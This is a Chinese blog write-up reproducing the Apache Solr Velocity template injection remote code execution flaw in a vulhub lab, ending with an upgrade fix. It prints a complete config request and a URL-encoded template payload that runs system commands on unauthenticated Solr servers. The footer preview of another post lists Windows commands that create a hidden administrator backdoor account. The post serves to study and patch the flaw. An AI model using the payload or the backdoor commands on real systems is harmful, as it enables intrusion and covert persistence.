Apache Solr模板注入远程代码执行漏洞


Apache Solr 模板注入远程代码执行漏洞

Apache Solr 是美国阿帕奇(Apache)软件基金会的一款基于 Lucene(一款全文搜索引擎)的搜索服务器。Apache Velocity 是一个提供 HTML 页面模板、email 模板和通用开源代码生成器模板的模板引擎。在 Apache Solr 的多个版本中,Apache SolrVelocityResponseWriter 功能的配置参数可通过 HTTP 请求指定,导致用户可通过设置特定参数后,通过注入任意 Velocity 模板造成任意命令执行。

影响范围

5.0.0 <= Apache Solr <= 8.3.1

环境搭建

可用 vulhubsolr 环境进行复现

docker-compose up -d
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db

contrib/velocity/lib 中以 velocity 开头的 jar包复制到 server/solr-webapp/webapp/WEB-INF/lib/ 下:

重启 solr 服务。

漏洞复现

在满足以上环境条件的情况下,利用此漏洞分两步骤。先通过一个 HTTP 请求将 params.resource.loader.enabled 这个关键的参数设置 true,这样就能允许任意的模板代码从用户的 HTTP 请求中指定。然后再通过指定任意 Velocity 模板代码执行任意命令。由于 Solr 默认未开启认证,在这种情况下,此漏洞利用不需要登录凭据。

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

开启params.resource.loader.enabled

发送 payload:
访问:http://IP:8983/solr/test/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

执行 id 命令的返回结果:

修复建议

  1. 升级到 Apache Solr 8.4

文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
隐蔽域后门 隐蔽域后门
隐蔽域后门 隐藏用户 隐蔽程序 粘滞键 常见后门方式隐藏用户net user yincang$ 123456qaq /add net localgroup administrators yincang$ /add 隐蔽程序NtGodM
2020-02-07
下一篇 
Apache Log4j SocketServer反序列化漏洞复现(CVE-2019-17571) Apache Log4j SocketServer反序列化漏洞复现(CVE-2019-17571)
Apache Log4j SocketServer 反序列化漏洞复现Apache Log4j 是一个基于 Java 的日志记录工具,是 Apache 软件基金会的一个项目,是几种 Java 日志框架之一。 近日,Apache Log4j 官
2019-12-30
  目录